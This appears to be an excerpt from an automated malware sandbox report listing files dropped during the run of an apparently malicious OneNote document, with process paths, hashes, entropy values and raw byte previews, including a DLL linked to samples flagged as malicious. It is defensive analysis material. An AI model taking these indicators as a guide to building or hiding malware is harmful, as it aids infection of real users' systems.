                                                                                                                                                                                                              Preview:2...>...........v........ .. "..2...>...d...<...v.......@....!..........................................................................................................................................l...;...l....... {....z..I.......I.qk..B.....LZl....... {....z.l....I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'..............+-6....02u.t......N...^.................tlq.vJ.7..,1.f............(...............................D....I.qk..B.....LZ.............+-6....02u.t...................................l.......l.......l...........................................l..j....l..T&~..l.......l....g..l..H....l.. .)..l..$....l....u...................;........4...4...4.................l..-l...l....z...y.. x.. ...........$........2..72..7.....*...o.e.L.o.c.I.D...o.e.L.o.c.C.o.m.m.e.n.t.......0.0.0.1.6..........(l..#l..8l....z...,4. .......$>........4...4
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop CS Windows, datetime=2004:03:12 11:05:55], progressive, precision 8, 612x618, components 3
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):68633
                                                                                                                                                                                                              Entropy (8bit):7.709776384921022
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:1536:tapXpSTJDOkFGdJdBk/slsbfsw1imaapnbvD8:U2OjJr6b07m1bvD8
                                                                                                                                                                                                              MD5:41241EE59AB7BC9EB34784E3BCE31CB4
                                                                                                                                                                                                              SHA1:98680761A51E9199CF3C89F68B5309FBEC7EE3CB
                                                                                                                                                                                                              SHA-256:035B26DF61855A3F36DBD30FDAB0C157C04C9E8AE2197EA4D4AEB3E82E6A4C2B
                                                                                                                                                                                                              SHA-512:3EE331D5BCEE4AD5D3FC9661D4AB4053F7D351591A094334F963C33C9D0E32CCCABE9334AD7C308108CE99617E064FE848DCD469ACD8D83FBE5C4452DE523D8F
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:......JFIF.....H.H......Exif..MM.*.............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop CS Windows.2004:03:12 11:05:55.............................d...........j...........................................&.(.........................................H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d......................................................................................................................................................"................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?../$.W:SZ./...9.....-...u......r.....].c...@W_.7...+......v.+PD.I..-<1.pDn-\.....p.$....0.}V....\..>.~..XN.o..l(E....ik..o.
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):20480
                                                                                                                                                                                                              Entropy (8bit):4.0573427858346305
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:384:DLaV/y4peiRJo+4iNY0B7WfOT/PjQKPkA:DW4RiRqFQY0B7WW
                                                                                                                                                                                                              MD5:EC140ED235BE3A5E86183E855983F812
                                                                                                                                                                                                              SHA1:AA025BA51A9DD6D0096C1435670E6193649FDDEB
                                                                                                                                                                                                              SHA-256:D3F53B0425487893C5B35BAB292C77C9AF221B2364629DCC002B88F41335A3AA
                                                                                                                                                                                                              SHA-512:EABC4E520351B79DE8E1ADD958A1A61F687F813DD3B8A6F526803FC78B30F23A03398FB4B19DBDC1D1EA82BEEC0151C4D465227D769F33B097BF11A90B2C5B23
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:....>.......,...D.......x ..`9......>.......|...D...H...@....:...........................................................................................................................................I.......I.qk..B.....LZ\.......\......!.@N..-.\......!.@N..-.\....Cs....:....7...Cs..I.qk..B.....LZ.I............Cs......Cs......Cs..........................................Csj.....CsT.t...Cs......Cs..N...CsH.....Cs..5...Cs..F.%.Cs..................;........4...4...4..............Cs:.CsL.Cs..z...y.. x.. ...........$........2..72..7.....*...o.e.L.o.c.I.D...o.e.L.o.c.C.o.m.m.e.n.t.......0.0.0.5............'.Cs%.Cs9.Cs..z...,4. .......$>........4.@.4..`..7.....................D..n4..o4..p4...4. ..1........Cs*.....Cs....%.Cs#...'.Cs&...2.Cs....9.Cs....:.Cs$.....Cs........'.Cs%.Cs..Cs..z...,4. .......$>........4.@.4..`..7.....................D..n4..o4..p4...4. .F.+............................;........4...4...4...3..................Cs:.Cs..Cs..z...y.. x.. ...........$........2..72..7.....*
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop CS Windows, datetime=2004:03:12 11:08:07], baseline, precision 8, 595x450, components 3
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):59832
                                                                                                                                                                                                              Entropy (8bit):7.308211468398169
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:1536:HS9SYFtN0+CRa9mfJy4zBAiIJhzrkHDV2hJK:yAmta+Tyy4zBIJW5WK
                                                                                                                                                                                                              MD5:DCDD543A4E0BA2C1909BA095D46FFBCB
                                                                                                                                                                                                              SHA1:B86C89537138FE07255354202D3EAD0B53B3C54D
                                                                                                                                                                                                              SHA-256:28F334B77068F71F5F92A95695433B950610204A0E5580CE567DB8FAD4993ECB
                                                                                                                                                                                                              SHA-512:5408C3259B7F3288A4BEB04342799AD5FE3A6F0EC7E92353B29B7E7E538DFA9903B39637226919E0421BC422635D25F5F8069DC7441864DC03E1B909BF5C2C84
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:......JFIF.....H.H.....fExif..MM.*.............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop CS Windows.2004:03:12 11:08:07.............................S.......................................................&.(.................................0.......H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d.................................................................................................................................................y...."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?......;R~+'....xh..~.n-}.......Te................^B..IU_....._...S......h.......!....9...A}6V=J......C..c.....Ug.Wh......
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):12288
                                                                                                                                                                                                              Entropy (8bit):4.781910948413335
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:192:hsaDOlPq4yFDC2cbQJ5/xpVuF63ZvXUU1wRJb+uwO60diSv96UjhjKNWtlOD4GiH:2UncbQJ55LuAp/5wRJEO60iSl6U1ONkl
                                                                                                                                                                                                              MD5:62B3339EA16A1B4984E3109C9A2528F0
                                                                                                                                                                                                              SHA1:FA561DB506AB3707825404D26F493F02C6D58B87
                                                                                                                                                                                                              SHA-256:AA9FB0A187BF5B34E8014E9A21113DF8E489061B341479F5059E19C6F0BB6C77
                                                                                                                                                                                                              SHA-512:C64AE39280FB480B8E89317ECB6E8301152D16D40CC0A3BBCEF7628FA9A14394C37C80532A42494244AB64E46097B5E32D4319493FF4E6087FF555BA53D8B371
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:2...>...v.......v....... ..X-..2...>...2.......v.......@...H,...........................................................................................................................................I.......I.qk..B.....LZ.*..P....*.9z.....3%...*.9z.....3%...*...I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'.............6{..~l..3.i...z.....N...^...............L.9...I.n.&.0...................................................I.qk..B......LZ............6{..~l..3.i...z...................................*.......*.......*...........................................*.j.....*.T.....*...o...*.......*...O...*...s...*.$.A.$.*.$.................;........4...4...4..............*.3.*.X.*...z...y.. x.. ...........$........2..72..7.....*...o.e.L.o.c.I.D...o.e.L.o.c.C.o.m.m.e.n.t.......0.0.0.9..............*.3.*.z.*...z...y.. x.. ...........$........2..72.
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):53259
                                                                                                                                                                                                              Entropy (8bit):7.651662052139301
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:768:dCiCBBenRYWDBCipMYGTbYGLHbXxoP/qEF+MU50qyJ30h2W474S/Aq/xc4674bi5:dCiIQXBCiwbDLHD0/sFyVel4Pi4UgE
                                                                                                                                                                                                              MD5:2EE369ABB7936F8C28FF0ABDD224EA05
                                                                                                                                                                                                              SHA1:FE9D304A7B49E31EAE439369ABC548E265149636
                                                                                                                                                                                                              SHA-256:FB12D59B8BE911247BBAFDD416852E8B74B028005A141CB4DBBBA109B4B6ED2C
                                                                                                                                                                                                              SHA-512:5CF396CA472C32AE988600176114106CB1619404DD899A3867A5AB43DC90583B771EF69B14EF50E56A21F038BF51D8463C6ADD2DE9D4CB523F6290E24A4DECB3
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d............................................................................................!1..AQa....q........"2..R..Bbr..#S....3$.....C.4v..(X.DtEUV.....cs..Td.5uf'Wgw8Hh........................!1Q.Aa....q.2...."R...r..3.t..U...B#S.4ub..C$d.5Ee&'7c.D%sT..............?.....?...k,lk^...M".Yo5.Qp.&s}b.m.:...W.x}.*.a......N1..d-n.-..^..b..TZ.W..."....F....^......ve5...^...2.:i...........~u2pK.z./&..u..L[I....Y....@y{|>..MN=:....Q[..H....a........|%..4fV....).....^.9b.f...F...p.=.W...aZ.........Z.t.n.....z3..[..lVh..\.N-.._.sK.y.._e.G.jig.a.7^....u...*.p.5.a.].........u/u..D.yl.XA..f.z..~.x.....N.....b=.uv.2.t.'.N.-.H..n.v.a.A[.Z.....T2...._...:....h..l.E..sm..a.3I...RE...fWb.Ek.0.#.)..Y#T...........u{....U....s.].7_H.2.`O6...P......}..4LR....]4.mid...
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):2278
                                                                                                                                                                                                              Entropy (8bit):3.855790266541854
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:48:uiTrlKxsxxLkxl9Il8uaRdseyYn310MS5tNDwmZEd1rc:v8YMRd3yQF035tCC
                                                                                                                                                                                                              MD5:ACDE53A96D68A8E50E6E739C2012D83C
                                                                                                                                                                                                              SHA1:E6B4289BD515685343018CBF96F8460DFAD666D9
                                                                                                                                                                                                              SHA-256:D9281D41D83CFB0CDCF04EE1949474B04BFE5766958E8519C1F69A185D240FA9
                                                                                                                                                                                                              SHA-512:5D1D469003AE881E910C720FE2D315C53810544976BCAD8172F6FC4089AD75D6535175B5D592B6851227101DB70AAF9B06A8E783805FECFF0265FE1887DEBD8F
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:{.".T.B.D.a.t.a.S.t.o.r.e.O.b.j.e.c.t.".:.{.".H.e.a.d.e.r.".:.{.".O.b.j.e.c.t.T.y.p.e.".:.".T.o.k.e.n.R.e.s.p.o.n.s.e.".,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.a.j.o.r.".:.2.,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.i.n.o.r.".:.1.}.,.".O.b.j.e.c.t.D.a.t.a.".:.{.".S.y.s.t.e.m.D.e.f.i.n.e.d.P.r.o.p.e.r.t.i.e.s.".:.{.".R.e.q.u.e.s.t.I.n.d.e.x.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".C.J.1.m.u.g.S.o.z.s.S.9.x.S.Z./.Q.v.O.c.+.E.J.4.u.2.c.=.".}.,.".E.x.p.i.r.a.t.i.o.n.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.E.m.A.h.j.U.7.2.Q.E.=.".}.,.".S.t.a.t.u.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.A.A.A.A.A.=.=.".}.,.".R.e.s.p.o.n.s.e.B.y.t.e.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.t.r.u.e.,.".V.a.l.u.e.".:.".A.Q.A.A.A.N.C.M.n.d.8.B.F.d.E.R.j.H.o.A.w.E./.C.l.+.s.B.A.A.A.A.8.k.Q.y.6.E.
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):6106
                                                                                                                                                                                                              Entropy (8bit):4.012104242463293
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:96:yYMkNg3SWixMpJM99ETsw0CJc0ftYHJuyxjht6T9ddFzYNUnU:yv3SWix8MsLJYHJTttk9dzYeU
                                                                                                                                                                                                              MD5:78401734B119D55A2B641559F8B10D91
                                                                                                                                                                                                              SHA1:A3C5A23B22F2151C095BA3DFA3158435307845E4
                                                                                                                                                                                                              SHA-256:A278889462D0202A0BF6A535631A2183BC527DAD45EBD51C9A98C4B47609EC57
                                                                                                                                                                                                              SHA-512:131E5A7F607B4827B5C25CFB92951926FE62B5E81BF57E54CE76FDFBA3C732A3617DF8DE27F5CD57CD15B0002F8F9234E950B8942C3A3C0EBF7DE5DDDCD18FA7
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:{.".T.B.D.a.t.a.S.t.o.r.e.O.b.j.e.c.t.".:.{.".H.e.a.d.e.r.".:.{.".O.b.j.e.c.t.T.y.p.e.".:.".T.o.k.e.n.R.e.s.p.o.n.s.e.".,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.a.j.o.r.".:.2.,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.i.n.o.r.".:.1.}.,.".O.b.j.e.c.t.D.a.t.a.".:.{.".S.y.s.t.e.m.D.e.f.i.n.e.d.P.r.o.p.e.r.t.i.e.s.".:.{.".R.e.q.u.e.s.t.I.n.d.e.x.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".V.H.X.L.G.R.5.H.j.D.k.3.C.i.F.b.L.a.m.K.N.+.n.c.g.T.0.=.".}.,.".E.x.p.i.r.a.t.i.o.n.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".P.5.y.l.n.f.5.Z.2.g.E.=.".}.,.".S.t.a.t.u.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.A.A.A.A.A.=.=.".}.,.".R.e.s.p.o.n.s.e.B.y.t.e.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.t.r.u.e.,.".V.a.l.u.e.".:.".A.Q.A.A.A.N.C.M.n.d.8.B.F.d.E.R.j.H.o.A.w.E./.C.l.+.s.B.A.A.A.A.8.k.Q.y.6.E.
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4542
                                                                                                                                                                                                              Entropy (8bit):3.9972927763782926
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:96:7mYMVlHuY/1rdsPtfDHljC1P3d++agSzEZtxJlBYDre:qxHJ1ylbFj2/d++agvjx3
                                                                                                                                                                                                              MD5:297F2EA7C12D739BC47F8867282B5313
                                                                                                                                                                                                              SHA1:EB94033D04A46426B0C67E7ED306975E9C11E132
                                                                                                                                                                                                              SHA-256:6E9D7A6CF923E60C8488736EDC1E85CAF951AAA9A1C62245744F48B5E369F402
                                                                                                                                                                                                              SHA-512:580EFBCA053EEA6B42E1DBF6B5E3EB8A58E408B2265CB222833639BDA4BE3833684CD7BE969BA61DDC0E4E67D8F86B9237211C69D0AAF3C62A8FE25F005E2F91
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:{.".T.B.D.a.t.a.S.t.o.r.e.O.b.j.e.c.t.".:.{.".H.e.a.d.e.r.".:.{.".O.b.j.e.c.t.T.y.p.e.".:.".T.o.k.e.n.R.e.s.p.o.n.s.e.".,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.a.j.o.r.".:.2.,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.i.n.o.r.".:.1.}.,.".O.b.j.e.c.t.D.a.t.a.".:.{.".S.y.s.t.e.m.D.e.f.i.n.e.d.P.r.o.p.e.r.t.i.e.s.".:.{.".R.e.q.u.e.s.t.I.n.d.e.x.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".V.q.Y.a.6.3.X.Y.9.b.4.Y.b.C.Z.g.f.0.u.y.E.6.v.n.x.e.w.=.".}.,.".E.x.p.i.r.a.t.i.o.n.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".i.l.c.7.b.C.0.7.2.Q.E.=.".}.,.".S.t.a.t.u.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.w.A.A.A.A.=.=.".}.,.".R.e.s.p.o.n.s.e.B.y.t.e.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.t.r.u.e.,.".V.a.l.u.e.".:.".A.Q.A.A.A.N.C.M.n.d.8.B.F.d.E.R.j.H.o.A.w.E./.C.l.+.s.B.A.A.A.A.8.k.Q.y.6.E.
                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\backgroundTaskHost.exe
                                                                                                                                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (2233)
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):6758
                                                                                                                                                                                                              Entropy (8bit):5.619254651239936
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:192:ZOoJj44RAEWH9nK5HILxXTqvGqbyThr/SCw:Zvj44ynKBYpqvGqbOhr/St
                                                                                                                                                                                                              MD5:FB29D2D85212859912BD87CD76C5B265
                                                                                                                                                                                                              SHA1:6AC17654572B058F9246692480759160A39263B9
                                                                                                                                                                                                              SHA-256:78DC09109CDA94C1703BD93DC97C48D6203D4013F67D9EBFFA63C50F418CF1B2
                                                                                                                                                                                                              SHA-512:8180697FAFF3091E7EDF2128ADAF9546515B18B431E39ED4A7BEC4AC509B790C18B6ECE50B90A903725E1D61C29539CAC5D70C2BD53DF411A86BCAFDC571B0C7
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:<!doctype html><html lang="en"><head> <title>Broadcom Inc. | Connecting Everything</title>.<link rel="shortcut icon" href="/img/favicon.ico">.<meta charset="utf-8">.<meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">.<meta http-equiv="x-ua-compatible" content="ie=edge">.<meta http-equiv="Last-Modified" content="Tue, 07 Feb 2023 04:59:22 GMT">.<meta property="og:title" content="Broadcom Inc. | Connecting Everything" />.<meta name="description" content="Broadcom Inc. is a global technology leader that designs, develops and supplies semiconductor and infrastructure software solutions.">.<meta property="og:description" content="Broadcom Inc. is a global technology leader that designs, develops and supplies semiconductor and infrastructure software solutions." />.<meta property="og:image" content="https://www.broadcom.com/media/blt4ac44e0e6c6d8341/blt476a993c2707b028/62e16f3bd3b8a5700456394e/wwwBlog_dc_Networking_1170x600.jpg" />.<meta name="keywords" cont
                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\backgroundTaskHost.exe
                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):84
                                                                                                                                                                                                              Entropy (8bit):5.444118131210374
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:3:EQ9IieDf2oVcWyUOpi+pFU3:ESQf2oCwOpi+pE
                                                                                                                                                                                                              MD5:60448D84B65CFE3497DAD82FFD0F7EF3
                                                                                                                                                                                                              SHA1:99FA6BA6782F87CF8541EB3A549E0796418AB172
                                                                                                                                                                                                              SHA-256:57454460AC444F3098FEEEDF3F74AA2D6812B7F21F3454C11809B72AC955B5D3
                                                                                                                                                                                                              SHA-512:2A73F548B5460E0E2022C00814AB79660956C92490E123139917AB4B72FF3F164AAD547DC71C5ACDF1391AA7D7FD9277FF013C7A9A4030B833768F55D9E1E458
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:hE4bHs5eDN/6B1GV7MMk46WsuQaTc1cBhA+r3ipoK3STV058uPIHFVu+LbR3Xk/BAgiVLHbtUy1ypz6VdP4=
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:modified
                                                                                                                                                                                                              Size (bytes):64
                                                                                                                                                                                                              Entropy (8bit):0.34726597513537405
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:3:Nlll:Nll
                                                                                                                                                                                                              MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                                                                                                                                                                              SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                                                                                                                                                                              SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                                                                                                                                                                              SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:@...e...........................................................
                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):1696752
                                                                                                                                                                                                              Entropy (8bit):6.289245533856013
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:24576:ii1trs9xgh4uC6t6B8R9Hb6fvTCK4KtwZ7E3r5am7/Wjh5a6PaDKpN:iVxgOuiB8RBb6WGwO8zSDo
                                                                                                                                                                                                              MD5:83D0087A8DC3B0EE76F68FB273FFF863
                                                                                                                                                                                                              SHA1:019AC92ECD80B9FA6CA9E3F6D09E649CE325ECB5
                                                                                                                                                                                                              SHA-256:4883769CFC1F8633A37A179D3B4AB41CF30B75190ECCF34056F1489648C310C6
                                                                                                                                                                                                              SHA-512:7A1D1D0EB8B7C55570EAC75445152899B3C371A430F4B31EE2F88430AC3425BF34221AF9E09DAA1E30CBEE508A749E9B1534904EE187C19272330ACEE915337C
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 2%
                                                                                                                                                                                                              Joe Sandbox View:
                                                                                                                                                                                                              • Filename: Document.one, Detection: malicious, Browse
                                                                                                                                                                                                              • Filename: notes.one, Detection: malicious, Browse
                                                                                                                                                                                                              • Filename: qopceyu.dll, Detection: malicious, Browse
                                                                                                                                                                                                              • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                                              • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                                              • Filename: 06mNIWJoVz.exe, Detection: malicious, Browse
                                                                                                                                                                                                              • Filename: 5W8kRNoAdB.exe, Detection: malicious, Browse
                                                                                                                                                                                                              • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                                              • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                                              • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                                              • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                                              • Filename: RS9009.img, Detection: malicious, Browse
                                                                                                                                                                                                              • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                                              • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                                              • Filename: Grant#2929.html, Detection: malicious, Browse
                                                                                                                                                                                                              • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                                              • Filename: RFSL#6617.img, Detection: malicious, Browse
                                                                                                                                                                                                              • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                                              • Filename: dBDfcVVkIk.exe, Detection: malicious, Browse
                                                                                                                                                                                                              • Filename: l39HA25qjw.exe, Detection: malicious, Browse
                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......-.=FizS.izS.izS.2.P.jzS.}.S.hzS.}.P./zS.}.].q{S.}.V.rzS.}.W..zS.}...hzS.}.Q.hzS.RichizS.........................PE..L...*.2............!.........................0....(K.........................0.......|....@A........................ ...U................................[.......Q...r..p........................... ................................................text...u........................... ..`PAGE....*........................... ..`RT........... ...................... ..`.data...TZ...0......................@....mrdata.x#.......$..................@....00cfg...............6..............@..@.rsrc................8..............@..@.reloc...Q.......R...6..............@..B................................................................................................................................................................................................
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:ASCII text, with very long lines (9330), with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):16777216
                                                                                                                                                                                                              Entropy (8bit):0.059102549317030725
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:1536:HePyAjURWFCBTVX5UXAz1De9idWT1dSXBJKjemY9BhJxBxKbU5vkEl9mdLnrzFvh:5iTpqxT
                                                                                                                                                                                                              MD5:C654D99630597B940980DCE881FF3B86
                                                                                                                                                                                                              SHA1:085A16115617E199BAFA3EC620033C3987B9759C
                                                                                                                                                                                                              SHA-256:F64458386A9A8A20695CE97FC2E1E159C07F5341A8F809C8E9ADE4F859236485
                                                                                                                                                                                                              SHA-512:C692E6CC49EFA0EBDD42EACBFAD10CABCCDEA8B18D86C71655EFDB0B51B0FF78009D13FB84A650F8D502466FFD1E004597EA404607769CE9345515B24C8D53BF
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:Timestamp.Process.TID.Area.Category.EventID.Level.Message.Correlation..02/07/2023 19:48:25.385.ONENOTE (0xD60).0xD64.Microsoft OneNote.Telemetry Event.b7vzq.Medium.SendEvent {"EventName":"Office.OneNote.System.AppLifeCycle.AppLaunch","Flags":2814758373932801,"InternalSequenceNumber":37,"Time":"2023-02-07T19:48:25.385Z"}...02/07/2023 19:48:25.541.ONENOTE (0xD60).0xD64.Microsoft OneNote.Telemetry Event.b7vzq.Medium.SendEvent {"EventName":"Office.OneNote.NotebookManagement.CreateNotebook","Flags":2814775570513665,"InternalSequenceNumber":42,"Time":"2023-02-07T19:48:25.541Z","Contract":"Office.System.Activity","Activity.CV":"b4hA8lpZdkuhvs+dSaD5Ig.1.12","Activity.Duration":15483,"Activity.Count":1,"Activity.AggMode":0,"Activity.Success":true,"Data.Activity.ActivityType":true,"Data.Activity.Namespace":"Office.OneNote.NotebookManagement","Data.SH_ErrorCode":0,"Data.Activity.Reason":"","Data.Activity.SucceedCount":1}...02/07/2023 19:48:25.541.ONENOTE (0xD60).0xD64.Microsoft OneNote.Telemetry
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):16777216
                                                                                                                                                                                                              Entropy (8bit):0.0
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:3::
                                                                                                                                                                                                              MD5:2C7AB85A893283E98C931E9511ADD182
                                                                                                                                                                                                              SHA1:3B4417FC421CEE30A9AD0FD9319220A8DAE32DA2
